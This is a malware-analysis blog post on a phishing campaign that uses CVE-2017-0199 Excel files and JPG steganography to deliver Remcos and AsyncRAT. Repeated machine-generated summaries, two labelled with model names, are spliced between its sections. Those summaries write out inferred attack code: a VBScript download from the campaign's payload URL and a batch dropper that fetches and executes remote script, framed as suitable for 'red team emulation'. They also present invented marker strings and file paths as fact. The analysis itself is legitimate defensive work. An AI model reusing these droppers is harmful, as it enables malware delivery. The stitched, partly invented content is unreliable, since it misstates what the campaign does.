New Steganographic Campaign Distributing Multiple Malware Kirti Kshatriya New Steganographic Campaign Distributing Multiple Malware Recently we have observed multiple stealer malware such as Remcos, DcRAT,AgentTesla, VIPKeyLogger, etc. distributed through a steganographic campaign. On tracing the roots, the campaign has been around for a while but has not been active since long. What makes the campaign interesting is the way the attack is orchestrated. In this blog, we will discuss distribution of Remcos and AsyncRAT via the campaign observed by us. Infection- Chain: The infection-chain starts with a phishing mail containing an excel file which exploits a vulnerability in excel and issues an http request to download a .hta file. The .hta file consisting of .vbs code writes a batch file which connects to a paste URL and downloads another obfuscated .vbs script. The .vbs script downloads a .jpg file containing padded base64 encoded second stage payload (malicious loader) file, which is decoded, and a function VAI is invoked through script. The loader file which gets a URL and targeted process name as argument, downloads a reversed base64 encoded file which when decoded gives us the final payload. Fig1.Infection chain

Phase: Initial Access

• Technique: Phishing via Malicious Excel File
• Procedure: The attacker sends a phishing email with an Excel file that exploits a vulnerability to initiate an HTTP request.

Phase: Execution

• Technique: HTA Execution

• Command: Download and execute a .hta file containing embedded .vbs code.

• Technique: VBS Script Execution

• Procedure: The .vbs script writes a batch file to connect to a paste URL and downloads another obfuscated .vbs script.

Phase: Delivery

• Technique: Steganography for Payload Delivery

• Procedure: The .vbs script downloads a .jpg file containing a padded base64 encoded payload.

• Technique: Base64 Decoding and Loader Execution

• Procedure: The encoded payload is decoded, and a function VAI is invoked to continue the attack.

Phase: Execution

• Technique: Loader Execution
• Command: Loader file gets a URL and targeted process name as arguments to download a reversed base64 encoded file.

Phase: Impact

• Technique: Execution of Final Payload
• Procedure: Final payload is executed after reversing and decoding the base64 encoded file, delivering malware such as Remcos and AsyncRAT.

Phishing Email: The initial point of attack is a phishing email, containing a malicious excel document which masquerades itself as a genuine file tricking users to open the attachment which contains the malicious code. Fig2.Phishing Email Excel document containing malicious ole package: The file is an exploit which leverages vulnerability CVE-2017-0199. It contains an embedded OLE2 embedded link object which issues an http request when we open the file. Fig3.Ole package from the excel document .HTA Script .hta file contains vbs code (Fig.4) that writes batch file which connects to a paste URL and downloads a vbs file which is a script with a huge chunk of garbage code (Fig.5). Fig4.HTA file The script writes VBS Script2: Fig5.VBS Script2 containing junk code On removal of the junk code and simplification, we get a base-64 encoded script which will be run using PowerShell (Fig.6). Fig6. VBS Script2 after removal of junk code

Phase: Initial Access

• Technique: Phishing via Malicious Document
• Procedure: The attacker sends a phishing email containing a malicious Excel document exploiting CVE-2017-0199. The document has an OLE2 embedded link object that triggers an HTTP request when opened.

Phase: Execution

• Technique: Malicious Macro Execution
• Procedure: Upon opening the Excel document, it exploits the vulnerability to execute embedded code, leading to the download of a malicious .hta file.

Phase: Execution

• Technique: HTA Abuse
• Procedure: The .hta file contains VBScript that writes a batch file. This batch file connects to a URL to download additional malicious VBScript.

Phase: Execution

• Technique: Obfuscated Scripting

• Procedure: The downloaded VBScript is heavily obfuscated with junk code, which, when simplified, contains a base64 encoded script.

• Technique: PowerShell Execution

• Command: powershell -EncodedCommand <Base64 Script>

This sequence of actions showcases how the threat actor uses malicious documents to trigger subsequent script executions for further exploitation.

Fig7.Decoded VBS Script2 Take note, here while VAI method is being invoked, url is being passed in first argument which is stored in $deject variable and the fifth argument is also important which we will discuss later while discussing our second payload which is injector dll. In a similar way we found AsyncRAT being distributed, mostly the initial chain will be the same, but we weren’t able to trace it back. In AsyncRAT’s case, the vbs script is masquerading as prnmngr.vbs tricking the user into thinking of it as a genuine script which adds, removes, and lists printers or printer connections, in addition to setting and displaying the default printer. But there is a small chunk of malicious code inserted in between to escape suspicion. Fig8.prnmngr.vbs distributing AsyncRAT Below is the chunk of code, which downloaded the JPG image from the hard coded URL [hxxps:// watchonlinehotvideos[.]top/omfg[.]jpg] similar as explained in the previous case Fig9.VBS script containing malicious code

Phase: Initial Access

• Technique: User Execution through Malicious Script
• Procedure: A VBS script masquerades as prnmngr.vbs, intended to look like a legitimate script for managing printers.

Phase: Execution

• Technique: Malicious Script Execution

• Procedure: The script executes and downloads a file from a hardcoded URL, disguised as a JPG image to avoid suspicion.

• Likely Command Syntax (inferred): vbs Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") objXMLHTTP.Open "GET", "https://watchonlinehotvideos.top/omfg.jpg", False objXMLHTTP.Send

Phase: Delivery

• Technique: Malicious Code Insertion
• Procedure: The VBS script contains a small chunk of additional malicious code designed to download and execute an additional payload, such as AsyncRAT.

Phase: Execution (AsyncRAT)

• Technique: Remote Access Trojan (RAT) Execution

• Procedure: Post download, the payload likely involves executing AsyncRAT, allowing remote control capabilities.

• Likely Command (inferred based on typical RAT behavior): shell rundll32.exe <path_to_dll>,<entry_point>

This set of procedures can be used to emulate the attack flow used in distributing and executing AsyncRAT using a deceptive VBS script.

Fig10.Above snippet simplified Same as we took a note for previous script, here the first argument passed is our reversed URL in variable $restoredtext and looks like a gibberish value/ random string being passed in other arguments and again we will keep fifth argument in mind. In both cases the sample is using steganography, the jpg file (Fig11.) downloaded conceals itself as a harmless picture which contains base64 encoded malware. As you can see in Fig7., it checks the marker <> and <> to get the whole malicious file and that is then decoded. Fig11. TXT file containing embedded base64encoded PE file Both the files are VB.NET dll file with internal filename as “Microsoft.Win32.TaskScheduler.dll” maybe to trick users in thinking it as a Microsoft dll. Fig12. DLL using microsoft’s name to trick users Both DLLs are obfuscated but on different levels. The one that that we got from Remcos campaign even has some common .NET function name obfuscated but in other case some of it were straight. But the code of the DLL was the same, doing the same thing. The DLL code is obfuscated but we can see the arguments being passed to it. Threat actor invoked the VAI method with 15 arguments. Based on passed argument the method will have capabilities such as loading another malware executable by process hollowing, creating persistence, etc.

Phase: Delivery

• Technique: Steganography for Malware Delivery
• Procedure: The threat actor uses a jpg file that conceals base64-encoded malware. The jpg is positioned as a harmless image.

Phase: Execution

• Technique: DLL Side-Loading
• Procedure: A VB.NET DLL file with the internal filename "Microsoft.Win32.TaskScheduler.dll" is used. It tricks users into thinking it's legitimate by using Microsoft's naming conventions.

Phase: Decoding & Execution

• Technique: Base64 Decoding and Execution
• Procedure: The DLL looks for markers "<>" and "<>" to identify and decode the base64-encoded malware.

Phase: Additional Capabilities

• Technique: Process Hollowing & Persistence
• Procedure: Threat actor invokes the VAI method with 15 arguments in the DLL, enabling actions such as loading another malware executable via process hollowing and creating persistence.

Note: The exact command lines and syntaxes are not explicitly provided, but this structure highlights the inferred methods and techniques based on the described behaviors.

Fig13. DLL code The first argument passed in the script (Fig7. /Fig10.) while invoking the method is our URL stored in variable $deject/$restoredtext is passed here as QBXtX. The value persistencia is null/gibberish value and the other value, which is passed decodes to 1, this is passed to Delegate11.smethod_0 and it returns boolean value. So, the final value will be 0 and the condition will fail. Hence, there will be no activity to remain persistent. Fig14.Decoded dll function The reversed URL, which is passed in argument QBXtX is stored in “text5” is reversed and with help of web client it downloads the data in “text6” string which is base64 encoded data in reverse format (Fig14). This is our final payload which alongwith the path “C:\Windows\SysWOW64” (decoded from Class219.smethod(10577)) of “caspol.exe” / “msbuild.exe” (fifth arguments) is passed as an argument to the “Tools.Ande” function. This function does the process hollowing with the targeted process which is being supplied as fifth argument (Fig15). Fig15. DLL creating process for process hollowing

Phase: Execution

• Technique: Process Hollowing via DLL Execution
• Procedure: A DLL is executed with parameters that include a reversed URL stored in a variable. The URL is decoded and used to download a payload using a web client. This payload is base64 encoded in reverse format.

Phase: Payload Delivery

• Technique: Process Injection using Tools.Ande
• Procedure:
• The downloaded payload, along with the path “C:\Windows\SysWOW64”, is used with either "caspol.exe" or "msbuild.exe".
• This is passed to the function “Tools.Ande” to perform process hollowing, targeting the specified process.

Contextual Details

• Function: Delegate11.smethod_0 is used for preliminary checks, ensuring particular conditions that allow further execution.
• Commands: Inferred use of external tools like “caspol.exe” or “msbuild.exe” to facilitate process injection.

As shown above, a new process is created using CreateProcess API in suspended state. The newly created process is unmapped using NtUnmapViewOfSection and memory is allocated using VirtualAllocEx, where the malicious code is then injected. With the use of SetThreadContext it adds the entry point to the injected code and finally, the process is resumed with ResumeThread. In our case, the final payload that we got is a Remcos and AsyncRAT Sample (Fig16). Fig16. Final payload which will be injected in clean process Final Payload: Remcos Remcos has always been around the malware world since its inception in 2016. From version as early as 1.0 to the most recent one, what keeps Remcos still relevant is in handling its core capability of command and control. Starting as a closed-source tool that was marketed as remote control and surveillance software, Remcos has come along a long way. Remcos mostly have a setting block with a batch of configurations which is encrypted and saved in the Resource section named “SETTINGS,”. It gets decrypted at the start and initializes Remcos with the setting block. Fig17.Remcos resource section

Phase: Defense Evasion

• Technique: Process Hollowing
• Procedure:
• API Calls:
  • Use CreateProcess API to create a process in a suspended state.
  • Utilize NtUnmapViewOfSection to unmap the memory of the newly created process.
  • Allocate memory in the target process using VirtualAllocEx.
  • Inject malicious code into the allocated memory.
  • Set the entry point of the injected code with SetThreadContext.
  • Resume the process execution using ResumeThread.

Phase: Execution

• Technique: Remote Access Tool Execution
• Tool: Remcos RAT
• Procedure:
• Decrypt the configuration block from the Resource section named "SETTINGS".
• Initialize Remcos with the decrypted settings for command and control operations.

Phase: Impact

• Technique: Remote System Control
• Tool Usage: AsyncRAT
• Procedure: Deploy AsyncRAT for remote surveillance and control purposes, facilitating further interaction with the compromised system.

Fig18. Remcos loading Resource data Remcos connects to C2 for C&C communication and further awaits the commands sent by the attacker. The key details from the configuration data extracted is as follows: C2: interestedthingsforkissinggirlwithloves[.]duckdns[.]org Filename: Remcos.exe Botnet name: zyno007 Mutex Created: Rmc-IB3RDF Further, in some cases Remcos is seen deploying malware like AgentTesla too. Final Payload: AsyncRAT AsyncRAT is a remote access Trojan (RAT), written in C# which offers standard RAT and information-stealing features, including the capabilities of logging keystrokes, execution/injection of additional payload, command-and-control, etc. The backdoor has capabilities based upon the embedded configuration. As you can see in the figure below (Fig19.), the execution starts with a De_lay function which defines sleep duration, mostly done to evade sandboxes.

Phase: Execution

• Technique: RAT Deployment
• Tool: Remcos
• Procedure: Remcos connects to the command and control (C2) server for instructions. It creates a mutex named Rmc-IB3RDF for ensuring a single instance.

Phase: Additional Payload Deployment

• Technique: Malware Deployment
• Tool: AgentTesla
• Procedure: In certain scenarios, Remcos deploys additional malware such as AgentTesla.

Phase: Final Payload Deployment

• Technique: Remote Access Trojan (RAT)
• Tool: AsyncRAT
• Procedure: AsyncRAT is deployed with capabilities to log keystrokes, execute/inject additional payloads, and establish command-and-control.

Phase: Defense Evasion

• Technique: Sleep Function to Evade Sandboxes
• Procedure: Execution starts with a De_lay function to define sleep duration, aiding in sandbox evasion.

Fig19.AsyncRAT Main function The InitializeSettings() function here accesses all the hardcoded configuration which is AES encrypted. Fig20. Initialize settings function The verifyhash() function (Fig20.) in last checks if the configurations are valid or not using the server certificate and server signature. The key details from the configuration data extracted are as follows: Ports:7878 Hosts:148[.]113[.]214[.]176 Version:1.0.7 MTX: asasasas2242dqwe Pastebin: null Group:Diama The Pastebin value is used by “WebClient.DownloadString” API (Fig21.) which can download additional resources and other payloads from Pastebin or other domains. In our case, it is null, so it selects hosts and port from the configuration and employs socket connection to interact with C2.

Phase: Command and Control

• Technique: Encrypted Configuration and C2 Communication
• Procedure: The threat actor uses a function to initialize settings by decrypting AES-encrypted configurations.
• Procedure: The configuration includes details such as ports and hosts for establishing a connection.
• Procedure: Uses the WebClient.DownloadString API to potentially download additional resources from a Pastebin URL, although it is null in this scenario. Instead, it connects to specified hosts and ports for C2 communication using a socket connection.

Fig21.InitializeClient Function IOCS: Remcos IOC’s 9d66405aebff0080cc5d28a1684d501fa7e183dc8b6340475fc06845509cb466 42813b301da721c34ca1aca29ce2e4c7d71ae580b519a3332a4ba71870b6a58e f67c6341bfe37f5b05c00a0dda738f472fdabd6ea94ca8dc761f57f11ce12036 aed291c023c3514fb97b4e08e291e03f52de91a2a8d311491b4ab8299db0aa0f faed55ed0102b1b2e3d853e8633abecbb9cec6a5f41c630097d8eaeefafba060 C2: interestedthingsforkissinggirlwithloves[.]duckdns[.]org C2: freebirdkissingonmylipswithnicefeelings[.]duckdns[.]org AsyncRAT b8fc29c02005c84131f34de083c2e81cdf615ff405877f9e73400bf35513c053 2d4ab87f9ea104075d372f4c211b1fb89adec60208d370b8fb2d748e1a73186c b2e8f720740bbd46f6ae3f450f265ace1044fe232141fbd84f269eafeb290812 a582e7e5b3ac37895e7cf484aaa8ea477deb90d99b47b2d9bfc018c604573889 C2: 148[.]113[.]214[.]176 Detections: Backdoor.Remcos Backdoor.MsilFC.S13564499 Trojan.loaderCiR MITRE ATTACK TTPs: Tactic Technique ID Name Initial Access (TA0001) T1566 Phishing Execution (TA0002) T1204 User Execution Persistence (TA0003) T1547.001 Registry Run Keys/ Startup Folder Defense Evasion (TA0005) T1055 Process Injection T1027 Obfuscated Files or Information T1036.004 Masquerading Task or Service

Phase: Initial Access

• Technique: Phishing
• Procedure: The attacker uses phishing emails to deliver malicious payloads, exploiting user interactions to gain initial access.

Phase: Execution

• Technique: User Execution
• Procedure: The user is tricked into running a malicious executable, typically delivered via a phishing email attachment or link.

Phase: Persistence

• Technique: Registry Run Keys / Startup Folder
• Procedure: Malware is configured to maintain persistence by creating entries in the Windows Registry Run keys or placing malicious files in the startup folder.

Phase: Defense Evasion

• Technique: Process Injection

• Procedure: The malware uses process injection techniques to hide its presence or elevate privileges by injecting code into legitimate processes.

• Technique: Obfuscated Files or Information

• Procedure: The attacker uses obfuscation techniques to conceal the malicious payload, making detection and analysis more difficult.

• Technique: Masquerading Task or Service

• Procedure: The malware disguises itself as a legitimate task or service to evade detection.

Tools Used

• Remcos RAT: Used for remote control, persistence, and execution of commands.
• AsyncRAT: Also used for remote administration and control of the compromised system.

Discovery (TA0007) T1614 System Location Discovery Exfiltration (TA0010) T1041 Exfiltration Over Command-and-Control Channel Command and Control (TA0011) T1001.0012 Steganography Conclusion: In this blog, we discussed the full attack-chain of the recent Steganographic campaign, where a harmless looking JPG file was revealed to be containing an injector DLL with malicious capabilities. We also explored how each malicious payload was carefully downloaded and executed in a highly methodical manner. The attack relied heavily on sophisticated masquerading techniques that can often deceive even experienced users. As is common, the chain of events began with a phishing email that contained an exploit which through multiple stages, ultimately deployed RemcosRAT/AsyncRAT (with the potential for other RATs or backdoors to be distributed in a similar manner). The command-and-control server, in this case, has the capability to deploy additional payloads, further compromising the victim’s system. This campaign highlights the critical importance of remaining vigilant and adopting robust cybersecurity practices to safeguard both our safety and the integrity of our data. Author: Kirti Kshatriya Co-Author: Manoj Kumar Neelamegam

Phase: Initial Access

• Technique: Phishing via Exploit
• Procedure: The attacker sends a phishing email containing an exploit that initiates the attack chain.

Phase: Execution

• Technique: Remote Access Trojan (RAT) Deployment
• Procedure: Deployment of RemcosRAT/AsyncRAT through multiple stages.

Phase: Discovery

• Technique: System Location Discovery
• Procedure: Query system information for location data using native OS commands or RAT capabilities.

Phase: Command and Control

• Technique: Exfiltration Over Command-and-Control Channel

• Procedure: Use of a pre-established command-and-control server to communicate and exfiltrate data.

• Technique: Steganography

• Procedure: Use of a seemingly harmless JPG file to conceal an injector DLL, leveraging steganography to evade detection.

Phase: Exfiltration

• Technique: Exfiltration Over Command-and-Control Channel
• Procedure: Transfer of stolen data over an established command-and-control channel using secure and covert methods.

Model: gemini-2.0-flash

```

Phase: Initial Access

• Technique: Phishing via Malicious Document
• Procedure: The attacker sends a spear-phishing email containing a malicious Excel document which exploits a vulnerability to download a .hta file.

Phase: Execution

• Technique: HTA Execution

• Procedure: Executes a downloaded .hta file containing VBScript code.

• Technique: Batch Script Execution

• Procedure: The VBScript writes and executes a batch script to download another obfuscated .vbs file from a paste URL.

• Technique: VBScript Execution

• Procedure: Executes a downloaded .vbs file that downloads a JPG file.

• Technique: PowerShell Execution via VBScript

• Procedure: VBScript executes PowerShell commands to decode and execute embedded payloads from the downloaded JPG file.

• Command: powershell -Command "..." (Likely inferred command structure based on VBScript execution of a base64 encoded payload, using techniques such as reverse and FromBase64String)

• Technique: PE Injection via DLL

• Procedure: A downloaded DLL (malicious loader/injector) is used to download and inject a reversed base64-encoded file (final payload) into a targeted process.
• Command: rundll32 <malicious_loader.dll> <url> <target_process_name> (Inferred based on description of the loader DLL being invoked with arguments such as URL and targeted process name.)

Phase: Defense Evasion

• Technique: Steganography

• Procedure: Embedded malicious base64-encoded payloads within JPG image.

• Technique: Obfuscation

• Procedure: Obfuscated files and executables to hide malicious intent.

• Technique: Masquerading

• Procedure: VBScript masquerades as prnmngr.vbs. DLL uses the Microsoft name in its name (Microsoft.Win32.TaskScheduler.dll) to trick users.

Phase: Payload Delivery and Execution

• Technique: Reverse string and base64 decoding
• Procedure: Downloading and decoding payloads involved reversing the string and Base64 decoding.

Phase: Persistence (Possible, but failed)

• Technique: Scheduled Task Creation (Attempted)
• Procedure: Based on analysis, a scheduled task creation might have been intended but failed, indicating an attempt to achieve persistence.

Phase: Command and Control (C2) - RAT Specific

• Technique: C2 Communication

• Procedure: Remcos connects to C2 server for command and control communication. The extracted data contains details to facilitate interaction with C2. (interestedthingsforkissinggirlwithloves[.]duckdns[.]org, etc)

• Technique: Additional Payload Execution

• Procedure: Downloading additional resources and payloads from other domains by "WebClient.DownloadString" API

Phase: Post-Exploitation (Based on RAT capabilities)

• Technique: Information Stealing

• Procedure: AsyncRAT and Remcos have keylogging and info-stealing abilities

• Technique: Command and Control

• Procedure: Ability to execute commands and control the infected system remotely. ```

Model: gemini-2.5-flash-preview-05-20

Here's a structured extraction of the procedures used by the threat actor, focusing on command lines, executed programs, tools, and attack techniques, suitable for red team emulation.

Phase: Initial Access

• Technique: Phishing: Spearphishing Attachment (T1566.001)
• Procedure: The attacker sends a phishing email containing a malicious Excel document that leverages a vulnerability (CVE-2017-0199) to initiate the attack chain.

Phase: Execution (Stage 1: Excel to HTA)

• Technique: Exploitation for Client Execution (T1203)
• Procedure: When the malicious Excel document (exploiting CVE-2017-0199) is opened, it issues an HTTP request to download an HTA (HTML Application) file.

Phase: Execution (Stage 2: HTA to Batch to VBScript)

• Technique: Command and Scripting Interpreter: VBScript (T1059.005)
• Technique: Command and Scripting Interpreter: Windows Command Shell (T1059.003)
• Procedure:
  • The downloaded HTA file is executed (implicitly by the system, often via mshta.exe).
  • The VBScript embedded within the HTA writes a batch file (e.g., C:\Windows\Temp\terga.bat) to disk.
  • The batch file downloads an obfuscated VBScript (e.g., C:\Windows\Temp\forebemoaned.vbs) from a URL.
  • The batch file then executes the newly downloaded VBScript using wscript.exe.
• Command (Inferred content of batch file, simplified from Fig4): batch @echo off setlocal set fugues=C:\Windows\Temp\forebemoaned.vbs echo Dim noncatalog, documentarist echo noncatalog = "<download_url_for_vbs_script>" echo Set documentarist = CreateObject("MSXML2.XMLHTTP") echo documentarist.open "GET", noncatalog, False echo documentarist.send echo If documentarist.Status = 200 Then echo ExecuteGlobal documentarist.responseText echo End If start /b wscript //nologo "C:\Windows\Temp\forebemoaned.vbs" timeout /t 1 /nobreak >nul del "C:\Windows\Temp\forebemoaned.vbs" endlocal Note: The noncatalog variable points to a specific paste URL (IOC) in the report, generalized here.

Phase: Execution (Stage 3: Obfuscated VBScript to DLL Loader)

• Technique: Command and Scripting Interpreter: PowerShell (T1059.006)
• Technique: Obfuscated Files or Information (T1027)
• Technique: Steganography (T1001.0012)
• Procedure:
  • The obfuscated VBScript (after de-obfuscation) executes an encoded PowerShell command.
  • The PowerShell script downloads a JPG file from a URL. This JPG file contains a Base64-encoded second-stage payload (a malicious .NET DLL loader) hidden between specific markers (<<BASE64_START>> and <<BASE64_END>>).
  • The PowerShell script extracts and decodes the Base64 content from the JPG file.
  • The decoded data, which is a .NET DLL, is loaded into memory using .NET reflection.
  • A specific method (VAI) within the loaded DLL is invoked, passing a reversed URL and a target process name as arguments.
• Command (PowerShell execution, simplified from Fig6): powershell powershell -NoProfile -Command "<Base64_encoded_powershell_script>" Note: The <Base64_encoded_powershell_script> contains the logic for downloading the JPG, extracting Base64, decoding, and loading/invoking the DLL.

Phase: Execution (Stage 4: DLL Loader - Process Hollowing)

• Technique: Process Injection (T1055.001)
• Technique: Obfuscated Files or Information (T1027)
• Procedure:
  • The loaded DLL loader first reverses a provided URL (passed as an argument) and then downloads the final payload, which is a reversed Base64-encoded file.
  • The downloaded data is reversed and decoded from Base64 to obtain the final malware executable (e.g., Remcos or AsyncRAT).
  • The DLL performs process hollowing:
    • It creates a new, legitimate process (e.g., caspol.exe or msbuild.exe) in a suspended state using the CreateProcess API.
    • It unmaps the original memory section of the suspended process using NtUnmapViewOfSection.
    • It allocates new memory within the suspended process using VirtualAllocEx.
    • It injects the final malware payload into the newly allocated memory space.
    • It modifies the entry point of the suspended process using SetThreadContext to point to the injected malicious code.
    • It resumes the thread of the now-hollowed process using ResumeThread, causing the injected malware to execute.
• Programs/Tools (APIs used by the DLL): CreateProcess, NtUnmapViewOfSection, VirtualAllocEx, SetThreadContext, ResumeThread.
• Target Processes (for hollowing): caspol.exe, msbuild.exe

Phase: Persistence

• Technique: Registry Run Keys / Startup Folder (T1547.001)
• Procedure: The final payload (e.g., AsyncRAT) utilizes an internal method (NormalStartup.Install()) to establish persistence, typically by adding entries to registry run keys or placing files in the startup folder.

Phase: Defense Evasion

• Technique: Obfuscated Files or Information (T1027)
• Technique: Masquerading: Match Legitimate Name or Location (T1036.004)
• Technique: Process Injection (T1055)
• Procedure:
  • The malicious DLLs are obfuscated, sometimes including obfuscation of common .NET function names.
  • The DLLs masquerade as legitimate Microsoft system files (e.g., "Microsoft.Win32.TaskScheduler.dll").
  • The VBScript responsible for distributing AsyncRAT masquerades as "prnmngr.vbs", a genuine Windows printer management script.
  • AsyncRAT incorporates anti-analysis techniques (e.g., Thread.Sleep(1000) for sandbox evasion) and anti-process features.
  • The attack chain involves multiple stages of data encoding/decoding and de-obfuscation (e.g., Base64, reversed Base64).

Phase: Command and Control

• Technique: Exfiltration Over Command and Control Channel (T1041)
• Technique: Application Layer Protocol (T1071.001 - HTTP/HTTPS for downloads, custom socket communication)
• Procedure:
  • Remcos decrypts its encrypted configuration data from its resource section ("SETTINGS") to identify C2 details.
  • Remcos establishes communication with its C2 server to receive commands and exfiltrate data.
  • AsyncRAT decrypts its hardcoded, AES-encrypted configuration, which includes C2 host and port information.
  • AsyncRAT establishes a socket connection to its C2 server for command and control.